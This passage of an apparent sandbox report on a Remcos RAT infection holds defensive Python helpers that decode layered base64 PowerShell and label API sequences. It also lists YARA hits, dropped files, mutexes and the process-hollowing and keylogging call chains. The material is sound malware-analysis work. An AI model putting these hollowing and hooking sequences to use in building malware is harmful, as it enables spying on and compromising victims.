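_B64_ARG = re.compile(r"FromBase64String\(\s*[\"']?([A-Za-z0-9+/=]{16,})", re.I)


def _fold_run(match) -> str:
    # Concatenate the pieces statically and re-emit them as one single-quoted literal.
    parts = []
    for literal, code in _ONE.findall(match.group(0)):
        parts.append(chr(int(code, 0)) if code else literal.replace("''", "'"))
    return "'" + "".join(parts).replace("'", "''") + "'"


def fold_concats(script: str) -> str:
    """Collapse every 'lit'+[char]N+... chain into a single literal, leaving other code intact."""
    return _RUN.sub(_fold_run, script)


def inline_string_vars(script: str) -> str:
    """Replace $name with its value wherever $name = 'literal' appears in the same script."""
    values = {name: val.replace("''", "'") for name, val in _ASSIGN.findall(script)}
    return re.sub(r"\$(\w+)",
                  lambda m: "'" + values[m.group(1)] + "'" if m.group(1) in values else m.group(0),
                  script)


def peel_layers(script: str, max_layers: int = 5) -> list:
    """Decode nested FromBase64String() stages; returns each decoded layer, outermost first."""
    layers = []
    current = script
    for _ in range(max_layers):
        match = _B64_ARG.search(inline_string_vars(fold_concats(current)))
        if not match:
            break
        try:
            current = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(current)
    return layers


# Canonical spelling per keyword; all-lower and all-UPPER are tolerated, anything else is an anomaly.
_CANONICAL = {
    "powershell": "powershell",
    "invoke-expression": "Invoke-Expression",
    "frombase64string": "FromBase64String",
    "getstring": "GetString",
    "bypass": "Bypass",
}


def has_case_anomaly(script: str) -> bool:
    """Flag the random-case keyword spelling the report calls a 'PowerShell case anomaly'."""
    for word in re.findall(r"[A-Za-z][A-Za-z0-9-]+", script):
        canon = _CANONICAL.get(word.lower())
        if canon and word not in (canon, canon.lower(), canon.upper()):
            return True
    return False


if __name__ == "__main__":
    print("case anomaly:", has_case_anomaly(LAYER1))
    for depth, layer in enumerate(peel_layers(LAYER1), 1):
        print(f"layer {depth}: {layer[:90]}")
```

Folding is done with a regex over literal/[char] runs rather than by evaluating the expression, so a hostile command line can never execute anything during triage; the trade-off is that constructs outside that grammar (format operators, -join, string methods) are left untouched and show up as an undecoded layer.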
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041ACFD OpenProcess,NtResumeProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00401806 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_004018C0 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_004016FD NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_004017B7 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 15_2_00402CAC NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 15_2_00402D66 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
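The "Code function" evidence in this report is a static view: each line is one function in the unpacked CasPol.exe image and the Win32/Nt API calls it makes, in call order. Capabilities are read off those sequences, for example SetWindowsHookExA with idHook 0x0D (WH_KEYBOARD_LL) is a keystroke hook, GetKeyboardState followed by ToUnicodeEx turns virtual-key codes into typed characters, and CreateProcessW ... Wow64GetThreadContext ... NtUnmapViewOfSection ... WriteProcessMemory ... Wow64SetThreadContext ... ResumeThread is the classic process-hollowing skeleton behind the "Injects a PE file into a foreign processes" signature. The Python below is an added example, not Joe Sandbox code: it parses lines in the report's format, matches the hollowing skeleton as an ordered subsequence (substring matching so the Wow64 and A/W variants count), and labels each function. The sample lines are copied from this report's CasPol.exe entries; the capability names, the WH_* constants and the SPI_SETDESKWALLPAPER caveat are ours.

```python
import re

# Evidence lines in this report's format (values taken from the CasPol.exe entries above);
# 13_2_00401806 is a window-procedure stub that should classify as nothing.
SAMPLE_LINES = [
    "Source: CasPol.exe | Code function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000",
    "Source: CasPol.exe | Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,"
    "GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard",
    "Source: CasPol.exe | Code function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,"
    "GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx",
    "Source: CasPol.exe | Code function: 12_2_00417245 GetModuleHandleA,GetProcAddress,CreateProcessW,"
    "VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,"
    "NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,"
    "WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,"
    "NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError",
    "Source: CasPol.exe | Code function: 12_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle",
    "Source: CasPol.exe | Code function: 12_2_0041BB81 SystemParametersInfoW",
    "Source: CasPol.exe | Code function: 13_2_00401806 NtdllDefWindowProc_W",
]

_LINE = re.compile(r"Code function:\s+(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<body>\S.*)$")

# SetWindowsHookEx idHook values that mean keystroke capture (winuser.h).
WH_KEYBOARD, WH_KEYBOARD_LL = 0x02, 0x0D

# Ordered skeleton of process hollowing. Steps are matched as substrings so that
# CreateProcessW and Wow64GetThreadContext satisfy CreateProcess / GetThreadContext.
HOLLOWING = ["CreateProcess", "GetThreadContext", "NtUnmapViewOfSection",
             "WriteProcessMemory", "SetThreadContext", "ResumeThread"]


def parse_line(line: str):
    """Return (function_id, [api names], [hex args]) or None for a non-matching line."""
    m = _LINE.search(line)
    if not m:
        return None
    body = m.group("body").strip()
    if " " in body:                       # "Api arg1,arg2,..." form: one call with its arguments
        api, arg_str = body.split(None, 1)
        return m.group("fn"), [api], [a for a in arg_str.split(",") if a]
    return m.group("fn"), [a for a in body.split(",") if a], []


def ordered_subsequence(pattern, apis) -> bool:
    """True when every pattern step occurs in order (not necessarily adjacent) in apis."""
    i = 0
    for api in apis:
        if i < len(pattern) and pattern[i] in api:
            i += 1
    return i == len(pattern)


def classify(apis, args) -> set:
    """Derive capability labels from one function's API sequence and (if present) arguments."""
    caps = set()
    seen = set(apis)
    if apis and apis[0].startswith("SetWindowsHookEx") and args:
        if int(args[0], 16) in (WH_KEYBOARD, WH_KEYBOARD_LL):
            caps.add("keyboard_hook")
    if "GetKeyboardState" in seen and "ToUnicodeEx" in seen:
        caps.add("keystroke_translation")
    if "OpenClipboard" in seen and "GetClipboardData" in seen:
        caps.add("clipboard_read")
    if "SetClipboardData" in seen:
        caps.add("clipboard_write")
    if ordered_subsequence(HOLLOWING, apis):
        caps.add("process_hollowing")
    if "NtSuspendProcess" in seen or "NtResumeProcess" in seen:
        caps.add("process_suspend_resume")
    if any(a.startswith("SystemParametersInfo") for a in apis):
        # Only a candidate: a wallpaper change needs uiAction == SPI_SETDESKWALLPAPER (0x14),
        # and the report does not show that argument.
        caps.add("wallpaper_candidate")
    return caps


def classify_report(lines) -> dict:
    """Map each function id to its sorted capability labels; functions with none are omitted."""
    result = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        fn, apis, args = parsed
        caps = classify(apis, args)
        if caps:
            result[fn] = sorted(caps)
    return result


if __name__ == "__main__":
    for fn, caps in classify_report(SAMPLE_LINES).items():
        print(fn, ", ".join(caps))
```

Because this is disassembly-derived, a hit says the capability is compiled in, not that it fired during the run; pair it with the dynamic evidence (the Yara memory matches and the "Maps a DLL or memory area into another process" behaviour) before treating the host as hollowed.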
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00CA7658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code functions (run 12_2): 12_2_004520E2, 12_2_0041D081, 12_2_0043D0A8, 12_2_00437160, 12_2_004361BA, 12_2_00426264, 12_2_00431387, 12_2_0043652C, 12_2_0041E5EF, 12_2_0044C749, 12_2_004367D6, 12_2_004267DB, 12_2_0043C9ED, 12_2_00432A59, 12_2_00436A9D, 12_2_0043CC1C, 12_2_00436D58, 12_2_00434D32, 12_2_0043CE4B, 12_2_00440E30, 12_2_00426E83, 12_2_00412F45, 12_2_00452F10, 12_2_00426FBD, 12_2_10017194, 12_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code functions (run 13_2): 13_2_0044B040, 13_2_0043610D, 13_2_00447310, 13_2_0044A490, 13_2_0040755A, 13_2_0043C560, 13_2_0044B610, 13_2_0044D6C0, 13_2_004476F0, 13_2_0044B870, 13_2_0044081D, 13_2_00414957, 13_2_004079EE, 13_2_00407AEB, 13_2_0044AA80, 13_2_00412AA9, 13_2_00404B74, 13_2_00404B03, 13_2_0044BBD8, 13_2_00404BE5, 13_2_00404C76, 13_2_00415CFE, 13_2_00416D72, 13_2_00446D30, 13_2_00446D8B, 13_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code functions (run 14_2): 14_2_00405038, 14_2_0041208C, 14_2_004050A9, 14_2_0040511A, 14_2_0043C13A, 14_2_004051AB, 14_2_00449300, 14_2_0040D322, 14_2_0044A4F0, 14_2_0043A5AB, 14_2_00413631, 14_2_00446690, 14_2_0044A730, 14_2_004398D8, 14_2_004498E0, 14_2_0044A886, 14_2_0043DA09, 14_2_00438D5E, 14_2_00449ED0, 14_2_0041FE83, 14_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code functions (run 15_2): 15_2_004050C2, 15_2_004014AB, 15_2_00405133, 15_2_004051A4, 15_2_00401246, 15_2_0040CA46, 15_2_00405235, 15_2_004032C8, 15_2_00401689, 15_2_00402F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00433FC0 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004020E7 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004338B5 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00416760 appears 69 times
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe | Process created: Commandline size = 2063
Source: C:\Windows\SysWOW64\cmd.exe | Process created: Commandline size = 2030
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engine; Classification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@24/19@4/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 12_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A64F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\simplegreatfeatureswithnicespeakingthingsentirelifegoingon[1].tiff
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Mutant created: \Sessions\1\BaseNamedObjects\Rmc-B3IX49
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1gdfremy.u5z.ps1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; System information queried: HandleInformation
                    Source: C:\Windows\SysWOW64\mshta.exe; File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\SysWOW64\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: CasPol.exe, CasPol.exe, 0000000E.00000002.2080096003.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
